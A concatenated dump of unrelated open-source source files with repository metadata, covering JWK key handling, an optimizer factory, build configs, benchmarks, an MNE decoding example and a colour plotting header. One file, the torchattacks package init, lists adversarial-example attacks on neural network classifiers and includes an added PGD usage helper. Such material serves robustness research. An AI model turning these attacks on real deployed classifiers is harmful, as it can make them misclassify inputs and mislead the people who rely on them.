return DiscoverRunner(reverse=reverse).run_tests([])
def start():
django.setup()
log_warnings()
setup_celery()
if run_tests() or run_tests(reverse=True):
sys.exit(1)
if __name__ == "__main__":
start()
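# Hedged invocation note, added for illustration only (not part of the
# original script): this file is meant to be executed directly, e.g.
# ``python runtests.py``. It runs the Django test suite once in normal order
# and, if that passes, again in reverse order, exiting with status 1 as soon
# as either run reports failures.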
|
5aae8b9431b96ee03a93d8000437de88d74f02a4
|
a2b3987eb8a50bee311f869e39d1c76e738ba2b8
|
/authlib/jose/rfc7517/jwk.py
|
b1578c49c5afecc54adc35e98293179530b0cf0a
|
[
"BSD-3-Clause",
"LicenseRef-scancode-warranty-disclaimer",
"LicenseRef-scancode-proprietary-license",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
lepture/authlib
|
abb3e14b8ccacef9ade90b28efed827ab65aadce
|
1846d6ac66e89bdb3268fffe15b7e49289966366
|
refs/heads/master
| 2023-09-04T04:27:56.650738
| 2023-09-02T07:42:47
| 2023-09-02T07:42:47
| 108,510,280
| 4,091
| 481
|
BSD-3-Clause
| 2023-09-13T13:04:38
| 2017-10-27T06:52:26
|
Python
|
UTF-8
|
Python
| false
| false
| 2,042
|
py
|
jwk.py
|
from authlib.common.encoding import json_loads
from .key_set import KeySet
from ._cryptography_key import load_pem_key
class JsonWebKey:
JWK_KEY_CLS = {}
@classmethod
def generate_key(cls, kty, crv_or_size, options=None, is_private=False):
"""Generate a Key with the given key type, curve name or bit size.
:param kty: string of ``oct``, ``RSA``, ``EC``, ``OKP``
:param crv_or_size: curve name or bit size
:param options: a dict of other options for Key
:param is_private: create a private key or public key
:return: Key instance
"""
key_cls = cls.JWK_KEY_CLS[kty]
return key_cls.generate_key(crv_or_size, options, is_private)
@classmethod
def import_key(cls, raw, options=None):
"""Import a Key from bytes, string, PEM or dict.
:return: Key instance
"""
kty = None
if options is not None:
kty = options.get('kty')
if kty is None and isinstance(raw, dict):
kty = raw.get('kty')
if kty is None:
raw_key = load_pem_key(raw)
for _kty in cls.JWK_KEY_CLS:
key_cls = cls.JWK_KEY_CLS[_kty]
if key_cls.validate_raw_key(raw_key):
return key_cls.import_key(raw_key, options)
key_cls = cls.JWK_KEY_CLS[kty]
return key_cls.import_key(raw, options)
@classmethod
def import_key_set(cls, raw):
"""Import KeySet from string, dict or a list of keys.
:return: KeySet instance
"""
raw = _transform_raw_key(raw)
if isinstance(raw, dict) and 'keys' in raw:
keys = raw.get('keys')
return KeySet([cls.import_key(k) for k in keys])
raise ValueError('Invalid key set format')
def _transform_raw_key(raw):
if isinstance(raw, str) and \
raw.startswith('{') and raw.endswith('}'):
return json_loads(raw)
elif isinstance(raw, (tuple, list)):
return {'keys': raw}
return raw
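def example_import_jwks(jwks_document):
    """Hedged usage sketch, added for illustration only (not part of the
    library): ``jwks_document`` is assumed to be a JWKS JSON string or a dict
    of the form ``{"keys": [...]}``; it is handed straight to the classmethod
    defined above and the resulting ``KeySet`` is returned."""
    return JsonWebKey.import_key_set(jwks_document)


def example_generate_ec_key():
    """Hedged usage sketch, added for illustration only: generate a private
    P-256 key via the classmethod above; ``'EC'`` and ``'P-256'`` follow the
    kty / curve naming described in ``generate_key``."""
    return JsonWebKey.generate_key('EC', 'P-256', is_private=True)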
|
14e265690c6653d6f5604c43a4dde0d8f283a536
|
09b542643e43d4e31035faf014fbd61b766587e0
|
/midi-script/DeviceParameter.py
|
4cff410bb00c9a512de5c2a51768c9f04d6848be
|
[
"MIT"
] |
permissive
|
leolabs/ableton-js
|
964f8077d4f25933045b50bc5f95934cc337d747
|
d239edf91a3c46a9444a6d5a533be66936452527
|
refs/heads/master
| 2023-08-03T21:46:31.449486
| 2023-07-27T12:02:26
| 2023-07-27T12:02:26
| 187,489,144
| 259
| 34
|
MIT
| 2023-07-22T10:22:36
| 2019-05-19T14:44:42
|
TypeScript
|
UTF-8
|
Python
| false
| false
| 566
|
py
|
DeviceParameter.py
|
from __future__ import absolute_import
from .Interface import Interface
class DeviceParameter(Interface):
@staticmethod
def serialize_device_parameter(param):
if param is None:
return None
device_parameter_id = Interface.save_obj(param)
return {
"id": device_parameter_id,
"name": param.name,
"value": param.value,
"is_quantized": param.is_quantized
}
def __init__(self, c_instance, socket):
super(DeviceParameter, self).__init__(c_instance, socket)
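# Hedged usage note, added for illustration only (not part of the original
# module): ``serialize_device_parameter`` is typically applied to each entry
# of a Live device's ``parameters`` list before the result is sent over the
# socket, e.g.
# ``[DeviceParameter.serialize_device_parameter(p) for p in device.parameters]``.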
|
ad775752ffc1196a21cf5b9843fb4013e9f394b1
|
acad69f0abe162eea0cb13cbe15bfd88f6da08b4
|
/optim/__init__.py
|
7dab15c8832dbb471480bd7e77bd6db9fdda52f2
|
[] |
no_license
|
zhangzjn/EMO
|
69afcac53800d8b9a390f1214e178e2ca4da3b24
|
141afbdbce04683790f0699f256327ec420be442
|
refs/heads/main
| 2023-08-27T19:04:23.313676
| 2023-08-15T04:09:55
| 2023-08-15T04:09:55
| 584,987,542
| 139
| 9
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,309
|
py
|
__init__.py
|
import torch
from torch import optim as optim
from timm.optim.adafactor import Adafactor
from timm.optim.adahessian import Adahessian
from timm.optim.adamp import AdamP
from timm.optim.nadam import Nadam
from timm.optim.radam import RAdam
from timm.optim.rmsprop_tf import RMSpropTF
from timm.optim.sgdp import SGDP
from timm.optim.lookahead import Lookahead
def check_keywords_in_name(name, keywords=()):
isin = False
for keyword in keywords:
if keyword in name:
isin = True
return isin
def add_weight_decay(model, weight_decay=1e-5, skip_list=(), skip_keywords=()):
decay = []
no_decay = []
for name, param in model.named_parameters():
if not param.requires_grad:
continue # frozen weights
if len(param.shape) == 1 or name.endswith(".bias") or (name in skip_list) or check_keywords_in_name(name, skip_keywords):
no_decay.append(param)
else:
decay.append(param)
return [
{'params': no_decay, 'weight_decay': 0.},
{'params': decay, 'weight_decay': weight_decay}]
def get_optim(cfg, net, lr, betas=None, filter_bias_and_bn=True):
optim_kwargs = {k: v for k, v in cfg.optim.optim_kwargs.items()}
optim_split = optim_kwargs.pop('name').lower().split('_')
optim_name = optim_split[-1]
optim_lookahead = optim_split[0] if len(optim_split) == 2 else None
if optim_kwargs.get('weight_decay', None) and filter_bias_and_bn:
skip = {}
skip_keywords = {}
if hasattr(net, 'no_weight_decay'):
skip = net.no_weight_decay()
if hasattr(net, 'no_weight_decay_keywords'):
skip_keywords = net.no_weight_decay_keywords()
params = add_weight_decay(net, optim_kwargs['weight_decay'], skip, skip_keywords)
optim_kwargs['weight_decay'] = 0.
else:
params = net.parameters()
if optim_kwargs.get('betas', None) and betas:
optim_kwargs['betas'] = betas
optim_terms = {
'sgd': optim.SGD,
'adam': optim.Adam,
'adamw': optim.AdamW,
'adadelta': optim.Adadelta,
'rmsprop': optim.RMSprop,
'nadam': Nadam,
'radam': RAdam,
'adamp': AdamP,
'sgdp': SGDP,
'adafactor': Adafactor,
'adahessian': Adahessian,
'rmsproptf': RMSpropTF,
}
optimizer = optim_terms[optim_name](params, lr=lr, **optim_kwargs)
if optim_lookahead:
optimizer = Lookahead(optimizer)
return optimizer
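def example_build_optimizer(net):
    """Hedged usage sketch, added for illustration only (not part of the
    original module): build the minimal config object that ``get_optim`` reads
    (``cfg.optim.optim_kwargs``) and create a Lookahead-wrapped AdamW
    optimizer. The config layout shown here is an assumption for demonstration
    purposes only."""
    from types import SimpleNamespace

    cfg = SimpleNamespace(
        optim=SimpleNamespace(
            optim_kwargs={
                'name': 'lookahead_adamw',  # "<wrapper>_<optimizer>", parsed above
                'weight_decay': 5e-2,       # moved into the param groups by add_weight_decay
                'betas': (0.9, 0.999),
            }
        )
    )
    return get_optim(cfg, net, lr=1e-3)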
|
7e5be0f5f8ee1fcc540ceb6ebc3e5fd946837a36
|
676acab8ff535019faff7da3afb8eecc3fa127f5
|
/target/pixhawk/fmt-io/project/rtconfig.py
|
86aee4c77b9f5d7397068d8df8dbc9d9cefcf8a8
|
[
"Apache-2.0"
] |
permissive
|
Firmament-Autopilot/FMT-Firmware
|
f8c324577245bd7e91af436954b4ce9421acbb41
|
0212fe89820376bfbedaded519552f6b011a7b8a
|
refs/heads/master
| 2023-09-01T11:37:46.194145
| 2023-08-29T06:33:10
| 2023-08-29T06:33:10
| 402,557,689
| 351
| 143
|
Apache-2.0
| 2023-09-12T05:28:39
| 2021-09-02T20:42:56
|
C
|
UTF-8
|
Python
| false
| false
| 1,550
|
py
|
rtconfig.py
|
import os
# toolchains options
ARCH='arm'
CPU='cortex-m3'
CROSS_TOOL='gcc'
# build version: debug or release
BUILD = 'release'
#device options
STM32_TYPE = 'STM32F10X_MD'
# cross_tool provides the cross compiler
# EXEC_PATH is the compiler execute path, for example, CodeSourcery, Keil MDK, IAR
if CROSS_TOOL == 'gcc':
PLATFORM = 'gcc'
EXEC_PATH = 'your-compiler-path'
else:
print('================ERROR============================')
    print('%s is not supported yet!' % CROSS_TOOL)
print('=================================================')
exit(0)
if os.getenv('RTT_EXEC_PATH'):
EXEC_PATH = os.getenv('RTT_EXEC_PATH')
if PLATFORM == 'gcc':
# toolchains
PREFIX = 'arm-none-eabi-'
CC = PREFIX + 'gcc'
AS = PREFIX + 'gcc'
AR = PREFIX + 'ar'
LINK = PREFIX + 'gcc'
TARGET_EXT = 'axf'
SIZE = PREFIX + 'size'
OBJDUMP = PREFIX + 'objdump'
OBJCPY = PREFIX + 'objcopy'
DEVICE = ' -mcpu=cortex-m3 -mthumb -ffunction-sections -fdata-sections'
CFLAGS = DEVICE + ' --specs=nano.specs -DUSE_STDPERIPH_DRIVER -DSTM32F10X_MD -Dgcc'
AFLAGS = ' -c' + DEVICE + ' -x assembler-with-cpp'
LFLAGS = DEVICE + ' -nostartfiles --specs=nano.specs -Wl,-no-wchar-size-warning,--gc-sections,-Map=build/fmt_io.map,-cref,-u,Reset_Handler -T stm32_rom.ld'
CPATH = ''
LPATH = ''
if BUILD == 'debug':
CFLAGS += ' -O0 -gdwarf-2'
AFLAGS += ' -gdwarf-2'
else:
CFLAGS += ' -O2'
POST_ACTION = OBJCPY + ' -O binary $TARGET build/fmt_io.bin\n' + SIZE + ' $TARGET \n'
|
fbf584b5dea7f12bb44bd5068540eb698ec2b777
|
bb33e6be8316f35decbb2b81badf2b6dcf7df515
|
/source/res/scripts/client/gui/shared/utils/requesters/game_restrictions_requester.py
|
774b15d4ca56338fde4dd8e08ee2ea9db7f3925e
|
[] |
no_license
|
StranikS-Scan/WorldOfTanks-Decompiled
|
999c9567de38c32c760ab72c21c00ea7bc20990c
|
d2fe9c195825ececc728e87a02983908b7ea9199
|
refs/heads/1.18
| 2023-08-25T17:39:27.718097
| 2022-09-22T06:49:44
| 2022-09-22T06:49:44
| 148,696,315
| 103
| 39
| null | 2022-09-14T17:50:03
| 2018-09-13T20:49:11
|
Python
|
UTF-8
|
Python
| false
| false
| 958
|
py
|
game_restrictions_requester.py
|
# Python bytecode 2.7 (decompiled from Python 2.7)
# Embedded file name: scripts/client/gui/shared/utils/requesters/game_restrictions_requester.py
import typing
import BigWorld
from adisp import async
from gui.shared.utils.requesters.abstract import AbstractSyncDataRequester
from skeletons.gui.shared.utils.requesters import IGameRestrictionsRequester
class GameRestrictionsRequester(AbstractSyncDataRequester, IGameRestrictionsRequester):
@property
def session(self):
return self.getCacheValue('session', {})
@property
def hasSessionLimit(self):
return len(self.session) > 0
def getKickAt(self):
return self.getCacheValue('session', {}).get('kick_at', 0)
@property
def settings(self):
return self.getCacheValue('settings', {})
@async
def _requestCache(self, callback):
BigWorld.player().gameRestrictions.getCache(lambda resID, value: self._response(resID, value, callback))
|
0297d2474c401c76e75d034ec7d30b43a9312913
|
f740d8dbaaf74688278c9df3badd3d6acc2a2761
|
/torchattacks/__init__.py
|
4f1fd2d7fecff9be787dbd31f29c78569e216ded
|
[
"MIT"
] |
permissive
|
Harry24k/adversarial-attacks-pytorch
|
4a52f47a79bbe88cd91e5ea76c3fc8d40e2cc1e5
|
3c8e03fdf6688bfa4e4ebfc6a63762df0ad258b0
|
refs/heads/master
| 2023-09-05T10:58:57.135718
| 2023-07-03T08:47:17
| 2023-07-03T08:47:17
| 182,017,442
| 1,420
| 312
|
MIT
| 2023-07-24T09:08:14
| 2019-04-18T04:43:39
|
Python
|
UTF-8
|
Python
| false
| false
| 1,957
|
py
|
__init__.py
|
# None attacks
from .attacks.vanila import VANILA
from .attacks.gn import GN
# Linf attacks
from .attacks.fgsm import FGSM
from .attacks.bim import BIM
from .attacks.rfgsm import RFGSM
from .attacks.pgd import PGD
from .attacks.eotpgd import EOTPGD
from .attacks.ffgsm import FFGSM
from .attacks.tpgd import TPGD
from .attacks.mifgsm import MIFGSM
from .attacks.upgd import UPGD
from .attacks.apgd import APGD
from .attacks.apgdt import APGDT
from .attacks.difgsm import DIFGSM
from .attacks.tifgsm import TIFGSM
from .attacks.jitter import Jitter
from .attacks.nifgsm import NIFGSM
from .attacks.pgdrs import PGDRS
from .attacks.sinifgsm import SINIFGSM
from .attacks.vmifgsm import VMIFGSM
from .attacks.vnifgsm import VNIFGSM
from .attacks.spsa import SPSA
from .attacks.pifgsm import PIFGSM
from .attacks.pifgsmplusplus import PIFGSMPLUSPLUS
# L2 attacks
from .attacks.cw import CW
from .attacks.pgdl2 import PGDL2
from .attacks.pgdrsl2 import PGDRSL2
from .attacks.deepfool import DeepFool
from .attacks.eaden import EADEN
# L1 attacks
from .attacks.eadl1 import EADL1
# L0 attacks
from .attacks.sparsefool import SparseFool
from .attacks.onepixel import OnePixel
from .attacks.pixle import Pixle
from .attacks.jsma import JSMA
# Linf, L2 attacks
from .attacks.fab import FAB
from .attacks.autoattack import AutoAttack
from .attacks.square import Square
# Wrapper Class
from .wrappers.multiattack import MultiAttack
from .wrappers.lgv import LGV
__version__ = '3.4.1'
__all__ = [
"VANILA", "GN",
"FGSM", "BIM", "RFGSM", "PGD", "EOTPGD", "FFGSM",
"TPGD", "MIFGSM", "UPGD", "APGD", "APGDT", "DIFGSM",
"TIFGSM", "Jitter", "NIFGSM", "PGDRS", "SINIFGSM",
"VMIFGSM", "VNIFGSM", "SPSA", "JSMA", "EADL1", "EADEN", "PIFGSM", "PIFGSMPLUSPLUS",
"CW", "PGDL2", "DeepFool", "PGDRSL2",
"SparseFool", "OnePixel", "Pixle",
"FAB", "AutoAttack", "Square",
"MultiAttack", "LGV",
]
__wrapper__ = [
"LGV", "MultiAttack",
]
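def example_pgd_attack(model, images, labels):
    """Hedged usage sketch, added for illustration only (not part of the
    package): craft L-inf PGD adversarial examples with one of the attacks
    exported above. ``model`` is assumed to be a classifier that accepts
    images scaled to [0, 1]."""
    attack = PGD(model, eps=8 / 255, alpha=2 / 255, steps=10)
    return attack(images, labels)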
|
639db2146c52a20a519cf762067be50f313a1749
|
af666c914f3878793ec76e20f71fa3ff992fa181
|
/Test/astc_image_sweep.py
|
575a75a21b31476fe51c7b29bde7e3ea04293fd8
|
[
"Apache-2.0"
] |
permissive
|
ARM-software/astc-encoder
|
d0cce03f91571ee96edb75ec7a9fe20538ba5ff5
|
3a2cda16c8bc20efa0dbda907447136ccfb88d7f
|
refs/heads/main
| 2023-09-04T23:31:54.734837
| 2023-09-03T17:18:36
| 2023-09-03T17:19:05
| 34,799,882
| 887
| 233
|
Apache-2.0
| 2023-09-03T12:43:16
| 2015-04-29T14:51:23
|
C
|
UTF-8
|
Python
| false
| false
| 2,739
|
py
|
astc_image_sweep.py
|
#!/usr/bin/env python3
# SPDX-License-Identifier: Apache-2.0
# -----------------------------------------------------------------------------
# Copyright 2021-2022 Arm Limited
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use this file except in compliance with the License. You may obtain a copy
# of the License at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
# -----------------------------------------------------------------------------
"""
A benchmarking sweep helper, which can generate a performance-vs-quality sweep
for a single input images. Like other test functionality, this uses structured
image directory layouts for determining image settings to pass to the codec.
"""
import argparse
import os
import platform
import sys
import testlib.encoder as te
import testlib.image as ti
def parse_command_line():
"""
Parse the command line.
Returns:
Namespace: The parsed command line container.
"""
parser = argparse.ArgumentParser()
# All reference encoders
parser.add_argument("--step", dest="step", default="10", type=int, help="step size")
parser.add_argument("--repeats", dest="repeats", type=int, default=1, help="repeats")
parser.add_argument(dest="image", default=None,
help="select the test image to run")
args = parser.parse_args()
return args
def main():
"""
The main function.
Returns:
int: The process return code.
"""
# Parse command lines
args = parse_command_line()
blockSizes = ["4x4", "5x5", "6x6", "8x8", "10x10"]
repeats = max(args.repeats, 1)
step = max(args.step, 1)
image = ti.TestImage(args.image)
codec = te.Encoder2x("avx2")
print("Block Size, Quality, PSNR (dB), Coding Time (s), Coding Rate (MT/s)")
for blockSize in blockSizes:
        for quality in range(0, 101, step):
localRepeats = repeats
if quality < 20:
localRepeats = localRepeats * 2
if quality < 40:
localRepeats = localRepeats * 2
results = codec.run_test(image, blockSize, f"{quality}", localRepeats, False)
psnr = results[0]
codingTime = results[2]
mts = results[3]
print(f"{blockSize}, {quality}, {psnr}, {codingTime}, {mts}")
return 0
if __name__ == "__main__":
sys.exit(main())
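# Hedged invocation example, added for illustration only (not part of the
# original script): sweep one structured test image in 10-quality steps with
# three timing repeats, e.g.
#
#     python ./Test/astc_image_sweep.py --step 10 --repeats 3 <image-dir>
#
# where <image-dir> follows the structured image directory layout mentioned in
# the module docstring; the exact layout is an assumption here.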
|
9c27fcf78c66ccd21e8a632767e44ec044d9e2aa
|
10ddfb2d43a8ec5d47ce35dc0b8acf4fd58dea94
|
/Python/find-the-closest-palindrome.py
|
a004106d3469519a5e9a504e4b0575bc0d30719c
|
[
"MIT"
] |
permissive
|
kamyu104/LeetCode-Solutions
|
f54822059405ef4df737d2e9898b024f051fd525
|
4dc4e6642dc92f1983c13564cc0fd99917cab358
|
refs/heads/master
| 2023-09-02T13:48:26.830566
| 2023-08-28T10:11:12
| 2023-08-28T10:11:12
| 152,631,182
| 4,549
| 1,651
|
MIT
| 2023-05-31T06:10:33
| 2018-10-11T17:38:35
|
C++
|
UTF-8
|
Python
| false
| false
| 495
|
py
|
find-the-closest-palindrome.py
|
# Time: O(l)
# Space: O(l)
class Solution(object):
def nearestPalindromic(self, n):
"""
:type n: str
:rtype: str
"""
l = len(n)
candidates = set((str(10**l + 1), str(10**(l - 1) - 1)))
        prefix = int(n[:(l + 1) // 2])
for i in map(str, (prefix-1, prefix, prefix+1)):
candidates.add(i + [i, i[:-1]][l%2][::-1])
candidates.discard(n)
return min(candidates, key=lambda x: (abs(int(x) - int(n)), int(x)))
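# Hedged worked example, added for illustration only: for n = "123" (l = 3)
# the candidate set contains 10**3 + 1 = "1001", 10**2 - 1 = "99", and the
# mirrored prefixes 11 -> "111", 12 -> "121", 13 -> "131" (prefix = int("12")).
# "121" is returned because |121 - 123| = 2 is the smallest absolute
# difference, with ties broken toward the smaller value.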
|
ca52657dbabca7860b7c9364bfc663f668c141c3
|
9ed3b16b3da72e4c47a04f2f2e3ef395e9fd9f20
|
/contrib/libexttextcat/template.py
|
9a907353a19310a4d73bae2242ae826eba142ab8
|
[
"BSD-2-Clause"
] |
permissive
|
chimera-linux/cports
|
fdae59dc25856942be3041e10e3533dbf8f883c3
|
714680161cd719dd047452c95fbb9b447bc23a86
|
refs/heads/master
| 2023-09-03T19:30:40.720670
| 2023-09-03T15:07:40
| 2023-09-03T15:07:40
| 374,000,317
| 118
| 37
|
BSD-2-Clause
| 2023-09-14T20:31:08
| 2021-06-05T02:07:34
|
Python
|
UTF-8
|
Python
| false
| false
| 810
|
py
|
template.py
|
pkgname = "libexttextcat"
pkgver = "3.4.6"
pkgrel = 0
build_style = "gnu_configure"
configure_args = ["--disable-werror"]
make_cmd = "gmake"
hostmakedepends = ["pkgconf", "gmake", "automake", "libtool"]
checkdepends = ["bash"]
pkgdesc = "N-Gram-Based Text Categorization library"
maintainer = "q66 <q66@chimera-linux.org>"
license = "BSD-3-Clause"
url = "https://wiki.documentfoundation.org/Libexttextcat"
source = (
f"https://dev-www.libreoffice.org/src/{pkgname}/{pkgname}-{pkgver}.tar.xz"
)
sha256 = "6d77eace20e9ea106c1330e268ede70c9a4a89744ddc25715682754eca3368df"
def post_install(self):
self.install_license("LICENSE")
@subpackage("libexttextcat-progs")
def _progs(self):
return self.default_progs()
@subpackage("libexttextcat-devel")
def _devel(self):
return self.default_devel()
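# Hedged build note, added for illustration only (not part of the template):
# inside a cports checkout a template like this is normally built through the
# top-level driver, e.g. ``./cbuild pkg contrib/libexttextcat``; the exact
# cbuild invocation is an assumption based on cports conventions.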
|
41d26d68360d1d712289172ae72fa9f26b37128f
|
e7bf1ff05319acc59bba5af5890041bd82c3e197
|
/examples/decoding/linear_model_patterns.py
|
1786df4a4b8c9a15bbf85b9f2340189a0ab0b403
|
[
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
mne-tools/mne-python
|
7e8d7e945dfbbee6432a4955cf050fa823f2d34b
|
f44636f00666b8eb869417960926d01690ff4f42
|
refs/heads/main
| 2023-09-04T03:05:37.402100
| 2023-09-03T14:15:18
| 2023-09-03T14:15:18
| 1,301,584
| 2,437
| 1,418
|
BSD-3-Clause
| 2023-09-14T19:23:38
| 2011-01-28T03:31:13
|
Python
|
UTF-8
|
Python
| false
| false
| 4,035
|
py
|
linear_model_patterns.py
|
"""
.. _ex-linear-patterns:
===============================================================
Linear classifier on sensor data with plot patterns and filters
===============================================================
Here decoding, a.k.a. MVPA or supervised machine learning, is applied to M/EEG
data in sensor space. Fit a linear classifier with the LinearModel object
providing topographical patterns which are more neurophysiologically
interpretable :footcite:`HaufeEtAl2014` than the classifier filters (weight
vectors). The patterns explain how the MEG and EEG data were generated from
the discriminant neural sources which are extracted by the filters.
Note patterns/filters in MEG data are more similar than EEG data
because the noise is less spatially correlated in MEG than EEG.
"""
# Authors: Alexandre Gramfort <alexandre.gramfort@inria.fr>
# Romain Trachel <trachelr@gmail.com>
# Jean-Remi King <jeanremi.king@gmail.com>
#
# License: BSD-3-Clause
# %%
import mne
from mne import io, EvokedArray
from mne.datasets import sample
from mne.decoding import Vectorizer, get_coef
from sklearn.preprocessing import StandardScaler
from sklearn.linear_model import LogisticRegression
from sklearn.pipeline import make_pipeline
# import a linear classifier from mne.decoding
from mne.decoding import LinearModel
print(__doc__)
data_path = sample.data_path()
sample_path = data_path / "MEG" / "sample"
# %%
# Set parameters
raw_fname = sample_path / "sample_audvis_filt-0-40_raw.fif"
event_fname = sample_path / "sample_audvis_filt-0-40_raw-eve.fif"
tmin, tmax = -0.1, 0.4
event_id = dict(aud_l=1, vis_l=3)
# Setup for reading the raw data
raw = io.read_raw_fif(raw_fname, preload=True)
raw.filter(0.5, 25, fir_design="firwin")
events = mne.read_events(event_fname)
# Read epochs
epochs = mne.Epochs(
raw, events, event_id, tmin, tmax, proj=True, decim=2, baseline=None, preload=True
)
del raw
labels = epochs.events[:, -1]
# get MEG and EEG data
meg_epochs = epochs.copy().pick_types(meg=True, eeg=False)
meg_data = meg_epochs.get_data().reshape(len(labels), -1)
# %%
# Decoding in sensor space using a LogisticRegression classifier
# --------------------------------------------------------------
clf = LogisticRegression(solver="liblinear") # liblinear is faster than lbfgs
scaler = StandardScaler()
# create a linear model with LogisticRegression
model = LinearModel(clf)
# fit the classifier on MEG data
X = scaler.fit_transform(meg_data)
model.fit(X, labels)
# Extract and plot spatial filters and spatial patterns
for name, coef in (("patterns", model.patterns_), ("filters", model.filters_)):
# We fitted the linear model onto Z-scored data. To make the filters
# interpretable, we must reverse this normalization step
coef = scaler.inverse_transform([coef])[0]
# The data was vectorized to fit a single model across all time points and
# all channels. We thus reshape it:
coef = coef.reshape(len(meg_epochs.ch_names), -1)
# Plot
evoked = EvokedArray(coef, meg_epochs.info, tmin=epochs.tmin)
fig = evoked.plot_topomap()
fig.suptitle(f"MEG {name}")
# %%
# Let's do the same on EEG data using a scikit-learn pipeline
X = epochs.pick_types(meg=False, eeg=True)
y = epochs.events[:, 2]
# Define a unique pipeline to sequentially:
clf = make_pipeline(
Vectorizer(), # 1) vectorize across time and channels
StandardScaler(), # 2) normalize features across trials
LinearModel( # 3) fits a logistic regression
LogisticRegression(solver="liblinear")
),
)
clf.fit(X, y)
# Extract and plot patterns and filters
for name in ("patterns_", "filters_"):
# The `inverse_transform` parameter will call this method on any estimator
# contained in the pipeline, in reverse order.
coef = get_coef(clf, name, inverse_transform=True)
evoked = EvokedArray(coef, epochs.info, tmin=epochs.tmin)
fig = evoked.plot_topomap()
fig.suptitle(f"EEG {name[:-1]}")
# %%
# References
# ----------
# .. footbibliography::
|
2ebf9f59e46f7ac532fe2b1dcb96c216a35c25f5
|
df1254b56f35b24644e00493c50d4b6eb3c15b7b
|
/colour/plotting/models.py
|
4cfea6b3f97e549ccbb4b67073f244ba63d19335
|
[
"BSD-3-Clause"
] |
permissive
|
colour-science/colour
|
908400b227cf81668675e41099256ce50b23ae4b
|
1fdf3b3042922e8d4f86b989b00a06e7e5d81102
|
refs/heads/develop
| 2023-09-01T23:17:07.186869
| 2023-08-26T09:40:45
| 2023-08-26T09:40:45
| 17,114,363
| 1,756
| 301
|
BSD-3-Clause
| 2023-09-14T10:24:37
| 2014-02-23T18:55:40
|
Python
|
UTF-8
|
Python
| false
| false
| 66,570
|
py
|
models.py
|
"""
Colour Models Plotting
======================
Defines the colour models plotting objects:
- :func:`colour.plotting.\
plot_RGB_colourspaces_in_chromaticity_diagram_CIE1931`
- :func:`colour.plotting.\
plot_RGB_colourspaces_in_chromaticity_diagram_CIE1960UCS`
- :func:`colour.plotting.\
plot_RGB_colourspaces_in_chromaticity_diagram_CIE1976UCS`
- :func:`colour.plotting.\
plot_RGB_chromaticities_in_chromaticity_diagram_CIE1931`
- :func:`colour.plotting.\
plot_RGB_chromaticities_in_chromaticity_diagram_CIE1960UCS`
- :func:`colour.plotting.\
plot_RGB_chromaticities_in_chromaticity_diagram_CIE1976UCS`
- :func:`colour.plotting.\
plot_ellipses_MacAdam1942_in_chromaticity_diagram_CIE1931`
- :func:`colour.plotting.\
plot_ellipses_MacAdam1942_in_chromaticity_diagram_CIE1960UCS`
- :func:`colour.plotting.\
plot_ellipses_MacAdam1942_in_chromaticity_diagram_CIE1976UCS`
- :func:`colour.plotting.plot_single_cctf`
- :func:`colour.plotting.plot_multi_cctfs`
- :func:`colour.plotting.plot_constant_hue_loci`
References
----------
- :cite:`Ebner1998` : Ebner, F., & Fairchild, M. D. (1998). Finding constant
hue surfaces in color space. In G. B. Beretta & R. Eschbach (Eds.), Proc.
SPIE 3300, Color Imaging: Device-Independent Color, Color Hardcopy, and
Graphic Arts III, (2 January 1998) (pp. 107-117). doi:10.1117/12.298269
- :cite:`Hung1995` : Hung, P.-C., & Berns, R. S. (1995). Determination of
constant Hue Loci for a CRT gamut and their predictions using color
appearance spaces. Color Research & Application, 20(5), 285-295.
doi:10.1002/col.5080200506
- :cite:`Mansencal2019` : Mansencal, T. (2019). Colour - Datasets.
doi:10.5281/zenodo.3362520
"""
from __future__ import annotations
import matplotlib.pyplot as plt
import numpy as np
import scipy.optimize
from matplotlib.patches import Ellipse
from matplotlib.path import Path
from colour.colorimetry import MultiSpectralDistributions
from colour.constants import EPSILON
from colour.geometry import (
point_at_angle_on_ellipse,
ellipse_coefficients_canonical_form,
ellipse_fitting,
)
from colour.graph import convert
from colour.hints import (
Any,
ArrayLike,
Callable,
Dict,
List,
Literal,
NDArrayFloat,
Sequence,
Tuple,
cast,
)
from colour.models import (
COLOURSPACE_MODELS_AXIS_LABELS,
COLOURSPACE_MODELS_DOMAIN_RANGE_SCALE_1_TO_REFERENCE,
CCTF_ENCODINGS,
CCTF_DECODINGS,
LCHab_to_Lab,
Lab_to_XYZ,
Luv_to_uv,
DATA_MACADAM_1942_ELLIPSES,
CCS_POINTER_GAMUT_BOUNDARY,
DATA_POINTER_GAMUT_VOLUME,
CCS_ILLUMINANT_POINTER_GAMUT,
RGB_Colourspace,
RGB_to_RGB,
RGB_to_XYZ,
UCS_to_uv,
XYZ_to_Luv,
XYZ_to_RGB,
XYZ_to_UCS,
XYZ_to_xy,
xy_to_Luv_uv,
xy_to_UCS_uv,
)
from colour.plotting import (
CONSTANTS_COLOUR_STYLE,
plot_chromaticity_diagram_CIE1931,
artist,
plot_chromaticity_diagram_CIE1960UCS,
plot_chromaticity_diagram_CIE1976UCS,
colour_cycle,
colour_style,
filter_passthrough,
filter_RGB_colourspaces,
filter_cmfs,
plot_multi_functions,
override_style,
render,
update_settings_collection,
)
from colour.plotting.diagrams import plot_chromaticity_diagram
from colour.utilities import (
CanonicalMapping,
as_array,
as_float_array,
as_int_array,
domain_range_scale,
first_item,
optional,
tsplit,
validate_method,
)
__author__ = "Colour Developers"
__copyright__ = "Copyright 2013 Colour Developers"
__license__ = "BSD-3-Clause - https://opensource.org/licenses/BSD-3-Clause"
__maintainer__ = "Colour Developers"
__email__ = "colour-developers@colour-science.org"
__status__ = "Production"
__all__ = [
"COLOURSPACE_MODELS_AXIS_ORDER",
"colourspace_model_axis_reorder",
"plot_pointer_gamut",
"plot_RGB_colourspaces_in_chromaticity_diagram",
"plot_RGB_colourspaces_in_chromaticity_diagram_CIE1931",
"plot_RGB_colourspaces_in_chromaticity_diagram_CIE1960UCS",
"plot_RGB_colourspaces_in_chromaticity_diagram_CIE1976UCS",
"plot_RGB_chromaticities_in_chromaticity_diagram",
"plot_RGB_chromaticities_in_chromaticity_diagram_CIE1931",
